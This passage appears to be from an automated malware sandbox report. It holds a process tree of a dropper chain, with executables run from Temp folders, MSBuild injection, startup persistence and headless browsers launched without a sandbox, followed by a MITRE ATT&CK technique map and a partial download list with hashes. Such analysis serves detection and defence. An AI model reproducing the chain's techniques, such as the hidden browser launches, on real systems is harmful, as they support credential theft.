                                                                        • Suspicious use of FindShellTrayWindow
                                                                        PID:5176
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\sy00esrw.vng /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\sy00esrw.vng\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\sy00esrw.vng --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fff916bdcf8,0x7fff916bdd04,0x7fff916bdd10
                                                                          9⤵
                                                                            PID:4440
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\sy00esrw.vng" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=1652,i,5393218465440114645,17568954219060303098,262144 --variations-seed-version --mojo-platform-channel-handle=1632 /prefetch:2
                                                                            9⤵
                                                                              PID:5852
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\sy00esrw.vng" --field-trial-handle=1996,i,5393218465440114645,17568954219060303098,262144 --variations-seed-version --mojo-platform-channel-handle=2064 /prefetch:3
                                                                              9⤵
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:1172
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --mute-audio --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\sy00esrw.vng" --field-trial-handle=2168,i,5393218465440114645,17568954219060303098,262144 --variations-seed-version --mojo-platform-channel-handle=2136 /prefetch:8
                                                                              9⤵
                                                                                PID:4996
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\sy00esrw.vng" --enable-dinosaur-easter-egg-alt-images --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=2732,i,5393218465440114645,17568954219060303098,262144 --variations-seed-version --mojo-platform-channel-handle=2748 /prefetch:1
                                                                                9⤵
                                                                                  PID:528
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\sy00esrw.vng" --enable-dinosaur-easter-egg-alt-images --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=2752,i,5393218465440114645,17568954219060303098,262144 --variations-seed-version --mojo-platform-channel-handle=2776 /prefetch:1
                                                                                  9⤵
                                                                                    PID:5880
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\sy00esrw.vng" --enable-dinosaur-easter-egg-alt-images --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3328,i,5393218465440114645,17568954219060303098,262144 --variations-seed-version --mojo-platform-channel-handle=3348 /prefetch:1
                                                                                    9⤵
                                                                                      PID:4388
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\sy00esrw.vng" --extension-process --enable-dinosaur-easter-egg-alt-images --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=3360,i,5393218465440114645,17568954219060303098,262144 --variations-seed-version --mojo-platform-channel-handle=3368 /prefetch:2
                                                                                      9⤵
                                                                                        PID:1056
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\sy00esrw.vng" --enable-dinosaur-easter-egg-alt-images --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=3396,i,5393218465440114645,17568954219060303098,262144 --variations-seed-version --mojo-platform-channel-handle=3436 /prefetch:1
                                                                                        9⤵
                                                                                          PID:2084
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\sy00esrw.vng" --extension-process --enable-dinosaur-easter-egg-alt-images --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=3404,i,5393218465440114645,17568954219060303098,262144 --variations-seed-version --mojo-platform-channel-handle=3936 /prefetch:2
                                                                                          9⤵
                                                                                            PID:840
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\sy00esrw.vng" --enable-dinosaur-easter-egg-alt-images --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=2592,i,5393218465440114645,17568954219060303098,262144 --variations-seed-version --mojo-platform-channel-handle=3956 /prefetch:1
                                                                                            9⤵
                                                                                              PID:2260
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-sandbox --mute-audio --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\sy00esrw.vng" --field-trial-handle=3372,i,5393218465440114645,17568954219060303098,262144 --variations-seed-version --mojo-platform-channel-handle=2764 /prefetch:8
                                                                                              9⤵
                                                                                                PID:1432
                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --disable-fre --no-default-browser-check --no-first-run --no-sandbox --allow-no-sandbox-job --disable-gpu --mute-audio --disable-audio --user-data-dir="C:\Users\Admin\AppData\Local\Temp\ehly5hpr.yjj"
                                                                                              8⤵
                                                                                              • Enumerates system info in registry
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                              PID:5856
                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\ehly5hpr.yjj /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\ehly5hpr.yjj\Crashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x238,0x23c,0x240,0x234,0x24c,0x7fff8a68f208,0x7fff8a68f214,0x7fff8a68f220
                                                                                                9⤵
                                                                                                  PID:5972
                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-sandbox --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\ehly5hpr.yjj" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=angle --use-angle=swiftshader-webgl --always-read-main-dll --field-trial-handle=2228,i,12887902026236218365,510619534126323994,262144 --variations-seed-version --mojo-platform-channel-handle=2224 /prefetch:2
                                                                                                  9⤵
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:3180
                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\ehly5hpr.yjj" --always-read-main-dll --field-trial-handle=1824,i,12887902026236218365,510619534126323994,262144 --variations-seed-version --mojo-platform-channel-handle=2236 /prefetch:3
                                                                                                  9⤵
                                                                                                    PID:4692
                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --mute-audio --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\ehly5hpr.yjj" --always-read-main-dll --field-trial-handle=2284,i,12887902026236218365,510619534126323994,262144 --variations-seed-version --mojo-platform-channel-handle=2276 /prefetch:8
                                                                                                    9⤵
                                                                                                      PID:220
                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\ehly5hpr.yjj" --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3020,i,12887902026236218365,510619534126323994,262144 --variations-seed-version --mojo-platform-channel-handle=3132 /prefetch:1
                                                                                                      9⤵
                                                                                                        PID:2268
                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\ehly5hpr.yjj" --instant-process --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3092,i,12887902026236218365,510619534126323994,262144 --variations-seed-version --mojo-platform-channel-handle=3184 /prefetch:1
                                                                                                        9⤵
                                                                                                          PID:3760
                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\ehly5hpr.yjj" --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=3612,i,12887902026236218365,510619534126323994,262144 --variations-seed-version --mojo-platform-channel-handle=3624 /prefetch:1
                                                                                                          9⤵
                                                                                                            PID:4568
                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\ehly5hpr.yjj" --extension-process --renderer-sub-type=extension --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=3584,i,12887902026236218365,510619534126323994,262144 --variations-seed-version --mojo-platform-channel-handle=3656 /prefetch:2
                                                                                                            9⤵
                                                                                                              PID:924
                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\ehly5hpr.yjj" --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --always-read-main-dll --field-trial-handle=3688,i,12887902026236218365,510619534126323994,262144 --variations-seed-version --mojo-platform-channel-handle=3660 /prefetch:1
                                                                                                              9⤵
                                                                                                                PID:4936
                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\ehly5hpr.yjj" --extension-process --renderer-sub-type=extension --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --always-read-main-dll --field-trial-handle=3724,i,12887902026236218365,510619534126323994,262144 --variations-seed-version --mojo-platform-channel-handle=3740 /prefetch:2
                                                                                                                9⤵
                                                                                                                  PID:6108
                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\ehly5hpr.yjj" --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --always-read-main-dll --field-trial-handle=3752,i,12887902026236218365,510619534126323994,262144 --variations-seed-version --mojo-platform-channel-handle=3792 /prefetch:1
                                                                                                                  9⤵
                                                                                                                    PID:3604
                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\ehly5hpr.yjj" --extension-process --renderer-sub-type=extension --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --always-read-main-dll --field-trial-handle=3784,i,12887902026236218365,510619534126323994,262144 --variations-seed-version --mojo-platform-channel-handle=3796 /prefetch:2
                                                                                                                    9⤵
                                                                                                                      PID:4268
                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\ehly5hpr.yjj" --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --always-read-main-dll --field-trial-handle=3828,i,12887902026236218365,510619534126323994,262144 --variations-seed-version --mojo-platform-channel-handle=3848 /prefetch:1
                                                                                                                      9⤵
                                                                                                                        PID:2132
                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\ehly5hpr.yjj" --extension-process --renderer-sub-type=extension --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --always-read-main-dll --field-trial-handle=3824,i,12887902026236218365,510619534126323994,262144 --variations-seed-version --mojo-platform-channel-handle=3892 /prefetch:2
                                                                                                                        9⤵
                                                                                                                          PID:2764
                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\ehly5hpr.yjj" --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --always-read-main-dll --field-trial-handle=3884,i,12887902026236218365,510619534126323994,262144 --variations-seed-version --mojo-platform-channel-handle=3920 /prefetch:1
                                                                                                                          9⤵
                                                                                                                            PID:4508
                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\ehly5hpr.yjj" --extension-process --renderer-sub-type=extension --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --always-read-main-dll --field-trial-handle=3912,i,12887902026236218365,510619534126323994,262144 --variations-seed-version --mojo-platform-channel-handle=3936 /prefetch:2
                                                                                                                            9⤵
                                                                                                                              PID:3024
                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-sandbox --mute-audio --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\ehly5hpr.yjj" --always-read-main-dll --field-trial-handle=4892,i,12887902026236218365,510619534126323994,262144 --variations-seed-version --mojo-platform-channel-handle=4780 /prefetch:8
                                                                                                                              9⤵
                                                                                                                                PID:2016
                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-sandbox --mute-audio --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\ehly5hpr.yjj" --always-read-main-dll --field-trial-handle=5128,i,12887902026236218365,510619534126323994,262144 --variations-seed-version --mojo-platform-channel-handle=5196 /prefetch:8
                                                                                                                                9⤵
                                                                                                                                  PID:4780
                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-sandbox --mute-audio --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\ehly5hpr.yjj" --always-read-main-dll --field-trial-handle=5364,i,12887902026236218365,510619534126323994,262144 --variations-seed-version --mojo-platform-channel-handle=5396 /prefetch:8
                                                                                                                                  9⤵
                                                                                                                                    PID:5800
                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --no-sandbox --mute-audio --onnx-enabled-for-ee --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\ehly5hpr.yjj" --always-read-main-dll --field-trial-handle=5372,i,12887902026236218365,510619534126323994,262144 --variations-seed-version --mojo-platform-channel-handle=5332 /prefetch:8
                                                                                                                                    9⤵
                                                                                                                                      PID:4536
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\10496010101\kI81c4U.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\10496010101\kI81c4U.exe"
                                                                                                                                6⤵
                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                PID:4684
                                                                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                  7⤵
                                                                                                                                    PID:4640
                                                                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                    7⤵
                                                                                                                                      PID:5936
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10496020101\EG11t89.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10496020101\EG11t89.exe"
                                                                                                                                    6⤵
                                                                                                                                    • Checks computer location settings
                                                                                                                                    • Drops startup file
                                                                                                                                    • Drops file in Windows directory
                                                                                                                                    PID:4000
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\0afeb9021a\nudwee.exe
                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\0afeb9021a\nudwee.exe"
                                                                                                                                      7⤵
                                                                                                                                      • Drops startup file
                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                      PID:7024
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10496030101\texL7GT.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10496030101\texL7GT.exe"
                                                                                                                                    6⤵
                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                    PID:6700
                                                                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                      7⤵
                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                      PID:7016
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10496040101\Bw5ZAOe.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10496040101\Bw5ZAOe.exe"
                                                                                                                                    6⤵
                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    PID:228
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\321c2a24e4\dumer.exe
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\321c2a24e4\dumer.exe
                                                                                                                          1⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          PID:6068
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\321c2a24e4\dumer.exe
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\321c2a24e4\dumer.exe
                                                                                                                          1⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          PID:3344
                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\GoogleChrome.exe
                                                                                                                          1⤵
                                                                                                                            PID:3448
                                                                                                                            • C:\Users\Admin\AppData\Local\GoogleChrome.exe
                                                                                                                              C:\Users\Admin\AppData\Local\GoogleChrome.exe
                                                                                                                              2⤵
                                                                                                                                PID:2784
                                                                                                                            • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
                                                                                                                              "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
                                                                                                                              1⤵
                                                                                                                                PID:4084
                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
                                                                                                                                1⤵
                                                                                                                                  PID:5844
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\321c2a24e4\dumer.exe
                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\321c2a24e4\dumer.exe
                                                                                                                                  1⤵
                                                                                                                                    PID:6900
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\d96bd1b766\varen.exe
                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\d96bd1b766\varen.exe
                                                                                                                                    1⤵
                                                                                                                                      PID:6924

                                                                                                                                    Network

                                                                                                                                          MITRE ATT&CK Enterprise v16

                                                                                                                                          Reconnaissance

                                                                                                                                          Resource Development

                                                                                                                                          Initial Access

                                                                                                                                          Execution

                                                                                                                                          Command and Scripting Interpreter

                                                                                                                                          1
                                                                                                                                          T1059

                                                                                                                                          PowerShell

                                                                                                                                          1
                                                                                                                                          T1059.001

                                                                                                                                          Scheduled Task/Job

                                                                                                                                          1
                                                                                                                                          T1053

                                                                                                                                          Scheduled Task

                                                                                                                                          1
                                                                                                                                          T1053.005

                                                                                                                                          System Services

                                                                                                                                          1
                                                                                                                                          T1569

                                                                                                                                          Service Execution

                                                                                                                                          1
                                                                                                                                          T1569.002

                                                                                                                                          Persistence

                                                                                                                                          Boot or Logon Autostart Execution

                                                                                                                                          2
                                                                                                                                          T1547

                                                                                                                                          Registry Run Keys / Startup Folder

                                                                                                                                          2
                                                                                                                                          T1547.001

                                                                                                                                          Create or Modify System Process

                                                                                                                                          1
                                                                                                                                          T1543

                                                                                                                                          Windows Service

                                                                                                                                          1
                                                                                                                                          T1543.003

                                                                                                                                          Scheduled Task/Job

                                                                                                                                          1
                                                                                                                                          T1053

                                                                                                                                          Scheduled Task

                                                                                                                                          1
                                                                                                                                          T1053.005

                                                                                                                                          Privilege Escalation

                                                                                                                                          Boot or Logon Autostart Execution

                                                                                                                                          2
                                                                                                                                          T1547

                                                                                                                                          Registry Run Keys / Startup Folder

                                                                                                                                          2
                                                                                                                                          T1547.001

                                                                                                                                          Create or Modify System Process

                                                                                                                                          1
                                                                                                                                          T1543

                                                                                                                                          Windows Service

                                                                                                                                          1
                                                                                                                                          T1543.003

                                                                                                                                          Scheduled Task/Job

                                                                                                                                          1
                                                                                                                                          T1053

                                                                                                                                          Scheduled Task

                                                                                                                                          1
                                                                                                                                          T1053.005

                                                                                                                                          Defense Evasion

                                                                                                                                          Impair Defenses

                                                                                                                                          1
                                                                                                                                          T1562

                                                                                                                                          Modify Registry

                                                                                                                                          3
                                                                                                                                          T1112

                                                                                                                                          Virtualization/Sandbox Evasion

                                                                                                                                          2
                                                                                                                                          T1497

                                                                                                                                          Credential Access

                                                                                                                                          Unsecured Credentials

                                                                                                                                          1
                                                                                                                                          T1552

                                                                                                                                          Credentials In Files

                                                                                                                                          1
                                                                                                                                          T1552.001

                                                                                                                                          Discovery

                                                                                                                                          Browser Information Discovery

                                                                                                                                          1
                                                                                                                                          T1217

                                                                                                                                          Process Discovery

                                                                                                                                          1
                                                                                                                                          T1057

                                                                                                                                          Query Registry

                                                                                                                                          6
                                                                                                                                          T1012

                                                                                                                                          Remote System Discovery

                                                                                                                                          1
                                                                                                                                          T1018

                                                                                                                                          System Information Discovery

                                                                                                                                          4
                                                                                                                                          T1082

                                                                                                                                          System Location Discovery

                                                                                                                                          1
                                                                                                                                          T1614

                                                                                                                                          System Language Discovery

                                                                                                                                          1
                                                                                                                                          T1614.001

                                                                                                                                          System Network Configuration Discovery

                                                                                                                                          1
                                                                                                                                          T1016

                                                                                                                                          Internet Connection Discovery

                                                                                                                                          1
                                                                                                                                          T1016.001

                                                                                                                                          Virtualization/Sandbox Evasion

                                                                                                                                          2
                                                                                                                                          T1497

                                                                                                                                          Lateral Movement

                                                                                                                                          Collection

                                                                                                                                          Data from Local System

                                                                                                                                          1
                                                                                                                                          T1005

                                                                                                                                          Email Collection

                                                                                                                                          1
                                                                                                                                          T1114

                                                                                                                                          Command and Control

                                                                                                                                          Web Service

                                                                                                                                          1
                                                                                                                                          T1102

                                                                                                                                          Exfiltration

                                                                                                                                          Impact

                                                                                                                                          Service Stop

                                                                                                                                          1
                                                                                                                                          T1489

                                                                                                                                          Replay Monitor

                                                                                                                                          Loading Replay Monitor...

                                                                                                                                          Downloads

                                                                                                                                          • C:\Temper\5Suk4e8N.exe
                                                                                                                                            Filesize

                                                                                                                                            828KB

                                                                                                                                            MD5

                                                                                                                                            426ccb645e50a3143811cfa0e42e2ba6

                                                                                                                                            SHA1

